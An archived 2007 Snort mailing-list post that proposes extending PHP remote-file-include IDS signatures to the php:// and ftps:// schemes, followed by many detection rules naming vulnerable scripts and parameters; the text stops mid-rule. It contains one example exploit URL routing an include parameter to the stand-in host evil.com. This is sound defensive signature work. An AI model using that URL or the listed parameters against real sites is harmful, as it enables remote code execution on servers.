Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Snort-Signatures
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Snort-sigs] PHP remote include sigs (part II)

from [Jamie Riden] Network Security [Permanent Link]
Subject: [Snort-sigs] PHP remote include sigs (part II)
Date: Wed, 30 May 2007 11:04:45 +0100 
Hi there,

[part II - bleeding rules this time]

A lot of the PHP remote file include sigs have matches like
pcre:"/=\s*(https?|ftp)\:\//Ui" -

It turns out that PHP also ships with the following URL schemes
enabled by default:
php://filter/resource=http://www.example.com and
ftps://ftp.example.com - a brief test seems to confirm that these work
just as well as http for file inclusion.

ie. exploit URL would be something like :
http://www.victim.com/vuln.php?include=php://filter/resource=http://www.evil.com

In which case, you'd need to change the matches to
pcre:"/=\s*(https?|ftps?|php)\:\//Ui" throughout to catch all the
default exploitable conditions. I have tested this briefly, but a
sanity check would be welcome:

cheers,
 Jamie

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Aardvark Topsites PHP CONFIG[PATH] Remote
File Include Attempt"; flow:established,to_server;
uricontent:"CONFIG[PATH]="; nocase; pcre:"/(join|lostpw)\.php\?/Ui";
pcre:"/&CONFIG\x5bpath\x5d=(php|ftps?|https?)\:/Ui";
reference:cve,CVE-2006-2149; reference:url,www.osvdb.org/25158;
classtype:web-application-attack; sid:2002901; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- mtdialogo.php
pathCGX"; flow:established,to_server; uricontent:"/mtdialogo.php?";
nocase; uricontent:"pathCGX="; nocase;
pcre:"/=\s*(php|https?|ftps?)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003726; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- ltdialogo.php
pathCGX"; flow:established,to_server; uricontent:"/ltdialogo.php?";
nocase; uricontent:"pathCGX="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003727; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- login.php
pathCGX"; flow:established,to_server; uricontent:"/login.php?";
nocase; uricontent:"pathCGX="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003729; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- logingecon.php
pathCGX"; flow:established,to_server;
uricontent:"/inc/logingecon.php?"; nocase; uricontent:"pathCGX=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003728; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CJG Explorer Remote Inclusion Attempt --
pcltrace.lib.php g_pcltar_lib_dir"; flow:established,to_server;
uricontent:"/pcltrace.lib.php?"; nocase;
uricontent:"g_pcltar_lib_dir="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2660;
reference:url,www.milw0rm.com/exploits/3915; sid:2003737; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid SELECT"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"SELECT"; nocase; uricontent:"FROM"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003794; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid UNION SELECT"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003795; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid INSERT"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"INSERT"; nocase; uricontent:"INTO"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003796; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid DELETE"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"DELETE"; nocase; uricontent:"FROM"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003865; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid ASCII"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"ASCII("; nocase; uricontent:"SELECT"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003797; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid UPDATE"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"UPDATE"; nocase; uricontent:"SET"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003798; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE Cacti Input Validation Attack";
flow:established,to_server; content:"GET"; depth:3; nocase;
pcre:"/(config_settings|top_graph_header)\.php\?.*=(https?|ftps?|php)\:\//Ui";
classtype:web-application-activity; reference:url,www.cacti.net;
reference:url,www.idefense.com/application/poi/display?id=265&type=vulnerabilities;
reference:url,www.idefense.com/application/poi/display?id=266&type=vulnerabilities;
sid:2002129; rev:6;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB DynamicPAD Remote Inclusion Attempt --
dp_logs.php HomeDir"; flow:established,to_server;
uricontent:"/dp_logs.php?"; nocase; uricontent:"HomeDir="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2527;
reference:url,milw0rm.com/exploits/3868; sid:2003679; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB DynamicPAD Remote Inclusion Attempt --
index.php HomeDir"; flow:established,to_server;
uricontent:"/index.php?"; nocase; uricontent:"HomeDir="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2527;
reference:url,milw0rm.com/exploits/3868; sid:2003680; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB E-Gads Remote Inclusion Attempt -- common.php
locale"; flow:established,to_server; uricontent:"/common.php?";
nocase; uricontent:"locale="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2521;
reference:url,www.milw0rm.com/exploits/3846; sid:2003682; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Firefly Remote Inclusion Attempt -- config.php
DOCUMENT_ROOT"; flow:established,to_server;
uricontent:"/modules/admin/include/config.php?"; nocase;
uricontent:"DOCUMENT_ROOT="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2460;
reference:url,www.frsirt.com/english/advisories/2007/1554;
sid:2003690; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Gnopaster Common.php remote file include";
flow:established,to_server; uricontent:"/includes/common.php"; nocase;
pcre:"/root_path=\s*(ftps?|https?|php)\:\//Ui";
reference:bugtraq,18180; classtype:web-application-attack;
sid:2003333; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB LaVague Remote Inclusion Attempt --
printbar.php views_path"; flow:established,to_server;
uricontent:"/views/print/printbar.php?"; nocase;
uricontent:"views_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2607;
reference:url,www.milw0rm.com/exploits/3870; sid:2003716; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Generic membreManager.php remote file
include"; flow:established,to_server;
uricontent:"/membres/membreManager.php"; nocase;
pcre:"/include_path=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,22287; classtype:web-application-attack;
sid:2003331; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB miplex2 Remote Inclusion SmartyFU.class.php
system"; flow:established,to_server;
uricontent:"/lib/smarty/SmartyFU.class.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2608;
reference:url,www.milw0rm.com/exploits/3878; sid:2003717; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Open Translation Engine Remote Inclusion
Attempt -- header.php ote_home"; flow:established,to_server;
uricontent:"/skins/header.php?"; nocase; uricontent:"ote_home=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2676;
reference:url,www.milw0rm.com/exploits/3838; sid:2003741; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
language.php config"; flow:established,to_server;
uricontent:"/includes/language.php?"; nocase; uricontent:"config=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003742; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
layout_admin_cfg.php Root_Path"; flow:established,to_server;
uricontent:"/layout_admin_cfg.php?"; nocase; uricontent:"Root_Path=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003743; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
layout_cfg.php Root_Path"; flow:established,to_server;
uricontent:"/layout_cfg.php?"; nocase; uricontent:"Root_Path=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003744; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
layout_t_top.php Root_Path"; flow:established,to_server;
uricontent:"/skins/phpchess/layout_t_top.php?"; nocase;
uricontent:"Root_Path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003745; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPEventMan remote file include";
flow:established,to_server; uricontent:"/controller/"; nocase;
pcre:"/(text\.ctrl\.php|common\.function\.php)\?level=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,22358; classtype:web-application-attack;
sid:2003372; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPFirstPost Remote Inclusion Attempt
block.php Include"; flow:established,to_server;
uricontent:"/block.php?"; nocase; uricontent:"Include="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2665;
reference:url,www.milw0rm.com/exploits/3906; sid:2003740; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPHtmlLib Remote Inclusion Attempt --
widget8.php phphtmllib"; flow:established,to_server;
uricontent:"/examples/widget8.php?"; nocase; uricontent:"phphtmllib=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2614;
reference:url,www.securityfocus.com/archive/1/archive/1/467837/100/0/threaded;
sid:2003730; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPLojaFacil Remote Inclusion Attempt --
ftp.php path_local"; flow:established,to_server;
uricontent:"/ftp.php?"; nocase; uricontent:"path_local="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2615;
reference:url,www.milw0rm.com/exploits/3875; sid:2003731; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPLojaFacil Remote Inclusion Attempt --
db.php path_local"; flow:established,to_server;
uricontent:"/libs/db.php?"; nocase; uricontent:"path_local="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2615;
reference:url,www.milw0rm.com/exploits/3875; sid:2003732; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPLojaFacil Remote Inclusion Attempt --
libs_ftp.php path_local"; flow:established,to_server;
uricontent:"/libs/ftp.php?"; nocase; uricontent:"path_local="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2615;
reference:url,www.milw0rm.com/exploits/3875; sid:2003733; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB phpMyPortal Remote Inclusion Attempt --
articles.inc.php GLOBALS[CHEMINMODULES]"; flow:established,to_server;
uricontent:"/inc/articles.inc.php?"; nocase;
uricontent:"GLOBALS[CHEMINMODULES]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2594;
reference:url,www.milw0rm.com/exploits/3879; sid:2003703; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPSecurityAdmin Remote Inclusion Attempt --
logout.php PSA_PATH"; flow:established,to_server;
uricontent:"/include/logout.php?"; nocase; uricontent:"PSA_PATH=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2628;
reference:url,www.securityfocus.com/bid/23801; sid:2003735; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:
"BLEEDING-EDGE EXPLOIT WEB PHP remote file include exploit attempt";
flow: to_server,established; content:"GET"; nocase; depth:3;
uricontent:".php?"; nocase; pcre:"/=(https?|ftps?|php)\:\//Ui";
nocase; content:"cmd="; nocase; within: 100; classtype:
attempted-admin; sid: 2001810; rev:10; )
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (
msg:"BLEEDING-EDGE WEB PHP PHPNuke Remote File Inclusion Attempt";
flow:established,to_server; uricontent:"/iframe.php"; nocase;
uricontent:"file="; nocase; pcre:"/file=\s*(ftps?|php|https?)\:\//Ui";
reference:url,www.zone-h.org/en/advisories/read/id=8694/;
classtype:web-application-attack; sid:2002800; rev:3; )
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Turbulence Remote Inclusion Attempt --
turbulence.php GLOBALS[tcore]"; flow:established,to_server;
uricontent:"/user/turbulence.php?"; nocase;
uricontent:"GLOBALS[tcore]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2504;
reference:url,www.securityfocus.com/bid/23580; sid:2003683; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Web Calendar Remote File Inclusion
Attempt"; flow:established,to_server;
uricontent:"/send_reminders.php"; nocase;
pcre:"/includedir=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,14651; reference:cve,2005-2717;
classtype:web-application-attack; sid:2002898; rev:4;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPtree Remote Inclusion Attempt -- cms2.php
s_dir"; flow:established,to_server;
uricontent:"/plugin/HP_DEV/cms2.php?"; nocase; uricontent:"s_dir=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2573;
reference:url,www.milw0rm.com/exploits/3860; sid:2003693; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_image_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/image/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003672; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_liens_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/liens/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003673; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_liste_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/liste/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003674; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_special_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/special/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003675; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_texte_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/texte/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003676; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt -
Headerfile.php System"; flow:established,to_server;
uricontent:"/blocks/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003660; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
latest_files.php System"; flow:established,to_server;
uricontent:"/files/blocks/latest_files.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003661; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
latest_posts.php System"; flow:established,to_server;
uricontent:"/forums/blocks/latest_posts.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003662; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
groups_headerfile.php System"; flow:established,to_server;
uricontent:"/groups/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003663; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
filters_headerfile.php System"; flow:established,to_server;
uricontent:"/filters/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003664; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
links.php System"; flow:established,to_server;
uricontent:"/links/blocks/links.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003665; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
menu_headerfile.php System"; flow:established,to_server;
uricontent:"/menu/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003666; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
latest_news.php System"; flow:established,to_server;
uricontent:"/news/blocks/latest_news.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003667; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
settings_headerfile.php System"; flow:established,to_server;
uricontent:"/settings/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003668; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
users_headerfile.php System"; flow:established,to_server;
uricontent:"/modules/users/headerfile.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003681; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Pixaria Gallery Remote Inclusion Attempt --
psg.smarty.lib.php cfg[sys][base_path]"; flow:established,to_server;
uricontent:"/psg.smarty.lib.php?"; nocase;
uricontent:"cfg[sys][base_path]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2458;
reference:url,www.frsirt.com/english/advisories/2007/1390;
sid:2003691; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Pixaria Gallery Remote Inclusion
class.Smarty.php cfg[sys][base_path]"; flow:established,to_server;
uricontent:"/resources/includes/class.Smarty.php?"; nocase;
uricontent:"cfg[sys][base_path]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2457;
reference:url,www.milw0rm.com/exploits/3733; sid:2003702; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Plume CMS prepend.php Remote File Inclusion
attempt"; flow:to_server,established; uricontent:"/prepend.php";
nocase; content:"_px_config[manager_path]="; nocase;
pcre:"/_px_config\x5bmanager_path\x5d=(https?|php|ftps?)\:/i";
classtype:web-application-attack; reference:cve,CVE-2006-0725;
reference:bugtraq,16662; reference:nessus,20972; sid:2002815; rev:4;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Portail Includes.php remote file include";
flow:established,to_server; uricontent:"/includes/includes.php";
nocase; pcre:"/site_path=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,22361; classtype:web-application-attack;
sid:2003371; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Simple PHP Script Gallery Remote Inclusion
index.php gallery"; flow:established,to_server;
uricontent:"/index.php?"; nocase; uricontent:"gallery="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2679;
reference:url,www.securityfocus.com/bid/23534; sid:2003746; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TopTree Remote Inclusion Attempt --
tpl_message.php right_file"; flow:established,to_server;
uricontent:"/templates/default/tpl_message.php?"; nocase;
uricontent:"right_file="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2544;
reference:url,www.milw0rm.com/exploits/3854; sid:2003669; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Tropicalm Remote Inclusion Attempt --
dosearch.php RESPATH"; flow:established,to_server;
